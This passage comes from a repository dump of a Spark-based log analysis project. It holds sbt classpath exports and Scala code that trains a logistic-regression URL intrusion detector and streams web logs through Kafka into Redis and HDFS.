    "content": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes:/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\n"
  },
  {
    "path": "spark/project/target/streams/runtime/exportedProducts/_global/streams/export",
    "content": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
  },
  {
    "path": "spark/project/target/streams/runtime/externalDependencyClasspath/_global/streams/export",
    "content": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\n"
  },
  {
    "path": "spark/project/target/streams/runtime/fullClasspath/_global/streams/export",
    "content": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes:/Users/xander/.sbt/1.0/plugins/target/scala-2.12/sbt-1.0/classes:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\n"
  },
  {
    "path": "spark/project/target/streams/runtime/internalDependencyClasspath/_global/streams/export",
    "content": "/Users/xander/Desktop/logvision/spark/project/target/scala-2.12/sbt-1.0/classes\n"
  },
  {
    "path": "spark/project/target/streams/runtime/managedClasspath/_global/streams/export",
    "content": "/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant/1.9.9/ant-1.9.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-artifact/3.3.9/maven-artifact-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar:/Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar:/Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\n"
  },
  {
    "path": "spark/project/target/streams/runtime/unmanagedClasspath/_global/streams/export",
    "content": "\n"
  },
  {
    "path": "spark/project/target/streams/runtime/unmanagedJars/_global/streams/export",
    "content": "\n"
  },
  {
    "path": "spark/src/main/scala/learning.scala",
    "content": "import java.nio.channels.Pipe\n\nimport org.apache.spark.ml.{Pipeline, PipelineModel}\nimport org.apache.spark.ml.classification.LogisticRegression\nimport org.apache.spark.ml.feature.{HashingTF, IDF, NGram, RegexTokenizer, Tokenizer}\nimport org.apache.spark.rdd.RDD\nimport org.apache.spark.sql.{DataFrame, SparkSession}\nimport org.apache.spark.{SparkConf, SparkContext}\n\nobject learning {\n  // 基于逻辑回归分类的URL入侵检测\n  // 训练数据集的行格式定义\n  case class trainingData(url: String, label: Int)\n\n  // 数据预处理\n  def preProcessing(context: SparkContext, session: SparkSession, good_path: String, bad_path: String): Array[DataFrame] = {\n\n    // 载入数据集\n    val goodSet = context.textFile(good_path)\n    val badSet = context.textFile(bad_path)\n\n    // 添加标记（正常为0，异常为1）\n    val goodSetInPair = goodSet.map(line => trainingData(line, 0))\n    val badSetInPair = badSet.map(line => trainingData(line, 1))\n    val mixedSet:RDD[trainingData] = goodSetInPair ++ badSetInPair\n\n    // 将正常、异常与合并后的数据集转为DataFrame，并返回\n    return Array(\n      session.createDataFrame(mixedSet).toDF(\"url\", \"label\"),\n      session.createDataFrame(goodSetInPair).toDF(\"url\", \"label\"),\n      session.createDataFrame(badSetInPair).toDF(\"url\", \"label\"))\n  }\n\n  // 学习\n  def learning(context: SparkContext, session: SparkSession, good_path: String, bad_path: String, model_path: String): Unit = {\n\n    // 载入处理后的数据\n    val dataSet = preProcessing(context, session, good_path, bad_path)(0)\n\n    // 分词\n    // 打散为单字符序列\n    val regexTokenizer = new RegexTokenizer()\n        .setInputCol(\"url\")\n        .setOutputCol(\"char\")\n        .setPattern(\"\")\n\n    // 得到ngram序列（n=2）\n    val ngram = new NGram()\n      .setN(2)\n      .setInputCol(\"char\")\n      .setOutputCol(\"ngram\")\n\n    // 特征提取（TF-IDF）\n    // 哈希词频统计（TF）\n    val hashingTF = new HashingTF()\n      .setInputCol(\"ngram\")\n      .setOutputCol(\"row_feature\")\n    // 区分程度估算（IDF）\n    val idf = new IDF()\n      .setInputCol(\"row_feature\")\n      .setOutputCol(\"features\")\n\n    // 分类器（逻辑回归），接收label, features列\n    val model = new LogisticRegression()\n      .setMaxIter(100)\n      .setRegParam(0.001)\n\n    // 定义pipeline\n    val pipeline = new Pipeline()\n      .setStages(Array(regexTokenizer, ngram, hashingTF, idf, model))\n\n    // 开始训练，并持久化模型\n    val learner = pipeline.fit(dataSet)\n    learner.write.overwrite().save(model_path)\n\n  }\n\n  // 测试\n  def testing(context: SparkContext, session: SparkSession, good_path: String, bad_path: String, model_path: String): Unit = {\n\n    // 加载测试数据\n    val DataSet = preProcessing(context, session, good_path, bad_path)\n    val goodDataSet = DataSet(1)\n    val badDataSet = DataSet(2)\n\n    // 加载预训练模型\n    val model = PipelineModel.load(model_path)\n\n    // 开始测试\n    val goodResult = model.transform(goodDataSet)\n    val badResult = model.transform(badDataSet)\n\n    // 显示前10条结果，打印准确计数\n    goodResult.show(10)\n    badResult.show(10)\n\n    val goodLabelCount = goodResult.groupBy(\"label\").count()\n    val goodPredictionCount = goodResult.groupBy(\"prediction\").count()\n    val badLabelCount = badResult.groupBy(\"label\").count()\n    val badPredictionCount = badResult.groupBy(\"prediction\").count()\n    goodLabelCount.show(2)\n    goodPredictionCount.show(2)\n    badLabelCount.show(2)\n    badPredictionCount.show(2)\n  }\n\n  // 入侵检测\n  def applying(model_path: String, logRecord: DataFrame): DataFrame = {\n    // 加载预训练模型\n    val model = PipelineModel.load(model_path)\n\n    // 接收来自Streaming的url\n    // 带空值的payload\n    val payload = logRecord\n      .select(\"host\",\"rfc931\", \"userName\", \"dateTime\", \"reqMethod\", \"reqUrl\", \"reqProtocol\", \"statusCode\", \"bytes\")\n      .toDF(\"host\", \"rfc931\", \"username\", \"timestamp\", \"req_method\", \"url\", \"protocol\", \"status_code\", \"bytes\")\n    // 去空值处理后，代入模型得到结果\n    model.transform(payload.na.fill(Map(\"url\" -> \"\")))\n  }\n\n  def main(args: Array[String]): Unit = {\n\n    // Spark 初始化\n    val sparkConf = new SparkConf()\n      .setAppName(\"logv_learning\")\n      .setMaster(\"spark://10.0.0.222:7077\")\n      .set(\"spark.driver.allowMultipleContexts\", \"true\")\n      .set(\"spark.executor.cores\", \"10\")\n      .set(\"spark.executor.memory\", \"30G\")\n      .set(\"spark.driver.memory\", \"30G\")\n    val sparkContext = new SparkContext(sparkConf)\n    val sparkSession = SparkSession.builder()\n      .master(\"10.0.0.222\")\n      .appName(\"logv_learning\")\n      .getOrCreate()\n\n    // 学习\n    learning(sparkContext, sparkSession,\n      \"/home/logv/learning-datasets/training/good.txt\",\n      \"/home/logv/learning-datasets/training/bad.txt\",\n      \"/home/logv/IDModel\")\n\n    // 测试\n    testing(sparkContext, sparkSession,\n      \"/home/logv/learning-datasets/testing/good.txt\",\n      \"/home/logv/learning-datasets/testing/bad.txt\",\n    \"/home/logv/IDModel\")\n  }\n}\n"
  },
  {
    "path": "spark/src/main/scala/streaming.scala",
    "content": "import java.text.SimpleDateFormat\nimport java.util.concurrent.Future\nimport java.util.{Locale, Properties}\n\nimport com.redis.RedisClientPool\nimport org.apache.kafka.clients.consumer.ConsumerRecord\nimport org.apache.kafka.clients.producer.{KafkaProducer, ProducerRecord, RecordMetadata}\nimport org.apache.kafka.common.serialization.{StringDeserializer, StringSerializer}\nimport org.apache.spark.broadcast.Broadcast\nimport org.apache.spark.{SparkConf, SparkContext}\nimport org.apache.spark.rdd.RDD\nimport org.apache.spark.sql.{SaveMode, SparkSession}\nimport org.apache.spark.streaming.dstream.InputDStream\nimport org.apache.spark.streaming.{Seconds, StreamingContext}\nimport org.apache.spark.streaming.kafka010.ConsumerStrategies.Subscribe\nimport org.apache.spark.streaming.kafka010.KafkaUtils\nimport org.apache.spark.streaming.kafka010.LocationStrategies.PreferConsistent\n\nimport scala.util.matching.Regex\n\nobject streaming extends {\n\n  // 日志格式\n  case class log(host: String,\n                 rfc931: String,\n                 userName: String,\n                 dateTime: String,\n                 reqMethod: String,\n                 reqUrl: String,\n                 reqProtocol: String,\n                 statusCode: String,\n                 bytes: String)\n\n  // 重写Kafka生产方法\n  class KafkaSink[K, V](createProducer: () => KafkaProducer[K, V]) extends Serializable {\n    lazy val producer: KafkaProducer[K, V] = createProducer()\n\n    def send(topic: String, key: K, value: V): Future[RecordMetadata] =\n      producer.send(new ProducerRecord[K, V](topic, key, value))\n\n    def send(topic: String, value: V): Future[RecordMetadata] =\n      producer.send(new ProducerRecord[K, V](topic, value))\n  }\n  \n  // Kafka生产者初始化，生产分析结果\n  object KafkaSink {\n    import scala.collection.JavaConversions._\n    def apply[K, V](config: Map[String, Object]): KafkaSink[K, V] = {\n      val createProducerFunc = () => {\n        val producer = new KafkaProducer[K, V](config)\n        sys.addShutdownHook {\n          producer.close()\n        }\n        producer\n      }\n      new KafkaSink(createProducerFunc)\n    }\n\n    def apply[K, V](config: java.util.Properties): KafkaSink[K, V] = apply(config.toMap)\n  }\n\n  // 流式计算逻辑\n  def streaming(kafkaStream: InputDStream[ConsumerRecord[String, String]],\n                kafkaProducer: Broadcast[KafkaSink[String, String]],\n                sparkSession: SparkSession, sparkContext: SparkContext): Unit = {\n\n    // 按行分割每批日志\n    val lines = kafkaStream.flatMap { batch =>\n      batch.value().split(\"\\n\")\n    }\n\n    // 用正则匹配将日志格式化，并同时完成日期时间转时间戳\n    val simpleDateFormat = new SimpleDateFormat(\"dd/MMM/yyyy:HH:mm:ss Z\", Locale.ENGLISH)\n\n    val logRecords = lines.map { row =>\n      val pattern: Regex = \"\"\"^(\\S+) (\\S+) (\\S+) \\[([\\w:/]+\\s[+\\-]\\d{4})\\] \"(\\S+)\\s?(\\S+)?\\s?(\\S+)?\" (\\d{3}|-) (\\d+|-)\\s?\"?([^\"]*)\"?\\s?\"?([^\"]*)?\"?$\"\"\".r\n      val options = pattern.findFirstMatchIn(row)\n      if (options.isDefined) {\n        // 若匹配，返回格式化日志结构\n        val matched = options.get\n        log(matched.group(1), matched.group(2), matched.group(3),\n          String.valueOf(simpleDateFormat.parse(matched.group(4)).getTime),\n          matched.group(5), matched.group(6), matched.group(7), matched.group(8), matched.group(9))\n      }\n      else {\n        // 若不匹配，用空值跳过\n        log(\"foo\", \"foo\", \"foo\", \"0\", \"foo\", \"foo\", \"foo\", \"foo\", \"0\")\n      }\n    }\n\n    // 对每个日志字段计数\n    // 行数统计\n    val logLineCount = logRecords\n      .count()\n      .map(rdd => (\"count\", rdd.toInt))\n\n    // 日志大小统计（KB）\n    val logSize = logRecords\n      .flatMap(rdd => rdd.toString.split(\"\"))\n      .count()\n      .map(count => (\"sum\", (count / 1024).toInt))\n\n    // 请求IP统计\n    val hostCount = logRecords\n      .map(rdd => (rdd.host, 1))\n      .reduceByKey(_ + _)\n\n    // 身份统计\n    val rfc931Count = logRecords\n      .map(rdd => (rdd.rfc931, 1)).reduceByKey(_ + _)\n\n    // 用户名统计\n    val userNameCount = logRecords\n      .map(rdd => (rdd.userName, 1)).reduceByKey(_ + _)\n\n    // 时间戳统计\n    val dateTimeCount = logRecords\n      .map(rdd => (rdd.dateTime, 1))\n      .reduceByKey(_ + _)\n\n    // 请求方式统计\n    val reqMethodCount = logRecords\n      .map(rdd => (rdd.reqMethod, 1))\n      .reduceByKey(_ + _)\n\n    // 请求资源统计\n    val reqUrlCount = logRecords\n      .map(rdd => (rdd.reqUrl, 1))\n      .reduceByKey(_ + _)\n\n    // 请求协议统计\n    val reqProtocolCount = logRecords\n      .map(rdd => (rdd.reqProtocol, 1))\n      .reduceByKey(_ + _)\n\n    // 状态码统计\n    val statusCodeCount = logRecords\n      .map(rdd => (rdd.statusCode, 1))\n      .reduceByKey(_ + _)\n\n    // 流量统计（MB）\n    val bytesSum = logRecords\n      .map { rdd =>\n        if (rdd.bytes != \"-\")\n          (\"sum\", rdd.bytes.toInt / 1024 / 1024)\n        else\n          (\"sum\", 0)\n      }\n      .reduceByKey(_ + _)\n\n    // 创建Redis连接池，延迟初始化\n    lazy val redisClients = new RedisClientPool(\"10.0.0.222\", 6379)\n\n    // Redis持久化逻辑，使用有序集合（ZSET），对于重复记录每次更新分数以实现结果累加\n    def saveToRedis(rdd: RDD[(String, Int)], key: String): Unit = {\n      rdd.foreachPartition { part =>\n        // 对每个Partition创建一个连接\n        val con = redisClients.withClient(client => client)\n        // 对Partition中的每个记录进行持久化\n        part.foreach { each => {\n          try {\n            if (con != null && each != null) {\n              con.zincrby(key, each._2, each._1)\n            }\n          } catch {\n            case e: Exception => print(e)\n          }\n        }\n        }\n        // 关闭连接，释放资源\n        con.close()\n      }\n    }\n\n    // 结果持久化至Redis\n    logLineCount.foreachRDD(rdd => saveToRedis(rdd, \"line\"))\n    logSize.foreachRDD(rdd => saveToRedis(rdd, \"size\"))\n    hostCount.foreachRDD(rdd => saveToRedis(rdd, \"host\"))\n    rfc931Count.foreachRDD(rdd => saveToRedis(rdd, \"rfc931\"))\n    userNameCount.foreachRDD(rdd => saveToRedis(rdd, \"username\"))\n    dateTimeCount.foreachRDD(rdd => saveToRedis(rdd, \"datetime\"))\n    reqMethodCount.foreachRDD(rdd => saveToRedis(rdd, \"reqmt\"))\n    reqUrlCount.foreachRDD(rdd => saveToRedis(rdd, \"url\"))\n    reqProtocolCount.foreachRDD(rdd => saveToRedis(rdd, \"proto\"))\n    statusCodeCount.foreachRDD(rdd => saveToRedis(rdd, \"statcode\"))\n    bytesSum.foreachRDD(rdd => saveToRedis(rdd, \"traffic\"))\n\n    // 入侵检测、分析结果队列化与HDFS存储\n    logRecords.foreachRDD { rdd =>\n\n      import sparkSession.implicits._\n\n      // 应用到模型\n      val result = learning.applying(\"/home/logv/IDModel\", rdd.toDF())\n        .select(\"host\", \"rfc931\", \"username\", \"timestamp\", \"req_method\", \"url\", \"protocol\",\n          \"status_code\", \"bytes\", \"probability\", \"prediction\")\n      // 正常请求结果\n      val goodResult = result.where(\"prediction = 0.0\")\n      // 异常请求结果\n      val badResult = result.where(\"prediction = 1.0\")\n\n      // 分类计数\n      val goodCount = Seq((\"good\", goodResult.count().toInt))\n        .toDF(\"good\", \"count\").rdd\n        .map(row => (row.getString(0), row.getInt(1)))\n      saveToRedis(goodCount, \"good\")\n\n      val badCount = Seq((\"bad\", badResult.count().toInt))\n        .toDF(\"bad\", \"count\").rdd\n        .map(row => (row.getString(0), row.getInt(1)))\n      saveToRedis(badCount, \"bad\")\n\n      // 按时间顺序的分类计数\n      val goodCountPerTimestamp = goodResult\n        .groupBy(\"timestamp\")\n        .count()\n        .withColumnRenamed(\"count\", \"goodCount\")\n        .rdd.map(row => (row.getString(0), row.getLong(1).intValue()))\n      saveToRedis(goodCountPerTimestamp, \"goodts\")\n\n      val badCountPerTimestamp = badResult\n        .groupBy(\"timestamp\")\n        .count()\n        .withColumnRenamed(\"count\", \"badCount\")\n        .rdd.map(row => (row.getString(0), row.getLong(1).intValue()))\n      saveToRedis(badCountPerTimestamp, \"badts\")\n\n      // 将分析结果生产至Kafka\n      kafkaProducer.value.send(\"good_result\", goodResult.toDF().toJSON.collectAsList().toString)\n      kafkaProducer.value.send(\"bad_result\", badResult.toDF().toJSON.collectAsList().toString)\n\n      // 将分析结果存储到HDFS\n      result.write.format(\"json\").mode(SaveMode.Append).save(\"hdfs://localhost:9000/logv\")\n\n    }\n\n  }\n\n  def main(args: Array[String]): Unit = {\n\n    // Spark初始化\n    val sparkConf: SparkConf = new SparkConf()\n      .setAppName(\"logv_streaming\")\n      .setMaster(\"spark://10.0.0.222:7077\")\n      .set(\"spark.driver.allowMultipleContexts\", \"true\")\n    val sparkContext = new SparkContext(sparkConf)\n    val streamingContext = new StreamingContext(sparkContext, Seconds(\"1\".toInt))\n    val sparkSession = SparkSession.builder()\n      .master(\"10.0.0.222\")\n      .appName(\"logv_streaming\")\n      .getOrCreate()\n    // 检查点\n    streamingContext.checkpoint(\"/home/logv/streaming_checkpoint\")\n\n\n    // Kafka消费者初始化，消费来自Flume的数据流\n    val kafkaConsumerParams = Map[String, Object](\n      \"bootstrap.servers\" -> \"10.0.0.222:9092\",\n      \"key.deserializer\" -> classOf[StringDeserializer],\n      \"value.deserializer\" -> classOf[StringDeserializer],\n      \"group.id\" -> \"logv-ng_flumeToSpark\",\n      \"auto.offset.reset\" -> \"latest\",\n      \"enable.auto.commit\" -> (false: java.lang.Boolean)\n    )\n    val topics = Array(\"raw_log\")\n    val stream = KafkaUtils.createDirectStream(streamingContext, PreferConsistent, Subscribe[String, String](topics, kafkaConsumerParams))\n\n    // 创建Kafka生产者\n    val kafkaProducer: Broadcast[KafkaSink[String, String]] = {\n      val kafkaProducerConfig = {\n        val p = new Properties()\n        p.setProperty(\"bootstrap.servers\", \"10.0.0.222:9092\")\n        p.setProperty(\"key.serializer\", classOf[StringSerializer].getName)\n        p.setProperty(\"value.serializer\", classOf[StringSerializer].getName)\n        p\n      }\n      streamingContext.sparkContext.broadcast(KafkaSink[String, String](kafkaProducerConfig))\n    }\n\n\n\n    // 开始日志分析\n    streaming(stream, kafkaProducer, sparkSession, sparkContext)\n\n\n    streamingContext.start()\n    streamingContext.awaitTermination()\n\n  }\n}"
  },
  {
    "path": "spark/target/streams/_global/_global/checkBuildSources/_global/inputFileStamps/previous",
